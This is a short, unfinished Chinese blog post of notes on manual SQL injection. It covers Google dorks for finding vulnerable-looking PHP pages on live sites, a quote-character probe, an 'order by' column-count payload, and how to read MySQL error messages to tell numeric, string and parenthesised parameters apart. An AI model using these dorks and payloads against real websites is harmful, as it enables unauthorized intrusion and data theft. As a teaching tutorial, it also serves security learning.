版权归作者所有,转载请注明出处
手动sqli(未完成,持续更新)
手动SQLi
1.寻找目标:
inurl:.php?id=1/2/3/4/..
inurl:.course.php?id=5
2.测试是否有注入点:
'
3.测试字段数量:
order by 3 --+
4.显示数据库
报错信息判断:
1:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
最外层的单引号是字符串的,去掉后 sql 语句就是'1'' LIMIT 0,1,可以看出 id字段是字符型的。
2:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
id为数字型的,将前边的’去掉即可,其余无需更改
3:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
猜测 sql 语句为:
select * from users where id = ('$id')
属于字符型的变异,只加了一个括号,将最上边的payload稍加修改即可
